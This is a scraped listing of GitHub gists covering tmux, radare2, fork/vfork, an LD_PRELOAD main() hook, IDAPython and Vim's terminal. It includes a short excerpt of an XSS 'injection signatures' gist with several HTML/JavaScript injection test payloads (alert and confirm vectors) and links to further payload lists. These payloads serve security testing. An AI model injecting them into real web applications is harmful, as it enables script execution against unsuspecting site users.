start new:
tmux
start new with session name:
tmux new -s myname
xsscx
/ XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Last active
June 3, 2024 15:29
XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Remote File Include with HTML TAGS via XSS.Cx */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ | |
| /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ | |
| /* Updated September 29, 2014 */ | |
| /* RFI START */ | |
| <img language=vbs src=<b onerror=alert#1/1#> | |
| <isindex action="javas	cript:alert(1)" type=image> | |
| "]<img src=1 onerror=alert(1)> | |
| <input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> |
williballenthin
/ yet another radare2 cheatsheet.md
Last active
June 1, 2024 08:03
nicowilliams
/ fork-is-evil-vfork-is-good-afork-would-be-better.md
Last active
May 18, 2024 14:10
fork() is evil; vfork() is goodness; afork() would be better; clone() is stupid
I recently happened upon a very interesting implementation of popen() (different API, same idea) called popen-noshell using clone(2), and so I opened an issue requesting use of vfork(2) or posix_spawn() for portability. It turns out that on Linux there's an important advantage to using clone(2). I think I should capture the things I wrote there in a better place. A gist, a blog, whatever.
This is not a paper. I assume reader familiarity with
fork()in particular and Unix in general, though, of course, I link to relevant wiki pages, so if the unfamiliar reader is willing to go down the rabbit hole, they should be able to come ou
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Hook main() using LD_PRELOAD, because why not? | |
| * Obviously, this code is not portable. Use at your own risk. | |
| * | |
| * Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl' | |
| * Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out' | |
| */ | |
| #define _GNU_SOURCE | |
| #include <stdio.h> |
andreafioraldi
/ asov_cheatshit_singlefile.txt
Last active
February 22, 2024 07:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ___ ____ ______ __ | |
| / | / __ \/ ___/ | / / | |
| / /| |/ / / /\__ \| | / / | |
| / ___ / /_/ /___/ /| |/ / | |
| /_/__||||||_//____/ |___/__ _____ __ _ __ | |
| / ____/ /_ ___ _____/ /_/ ___// /_ (_) /_ | |
| / / / __ \/ _ \/ ___/ __/\__ \/ __ \/ / __/ | |
| / /___/ / / / __/ /__/ /_ ___/ / / / / / /_ | |
| \____/_/ /_/\___/\___/\__//____/_/ /_/_/\__/ |
Pai-Po
/ idapython_cheatsheet.md
Created
August 7, 2020 09:33
— forked from icecr4ck/idapython_cheatsheet.md
Cheatsheet for IDAPython
Since v8.1 (May 2018), Vim has shipped with a built-in terminal. See https://vimhelp.org/terminal.txt.html or type :help terminal for more info.
Why use this? Mainly because it saves you jumping to a separate terminal window. You can also use Vim commands to manipulate a shell session and easily transfer clipboard content between the terminal and files you're working on.
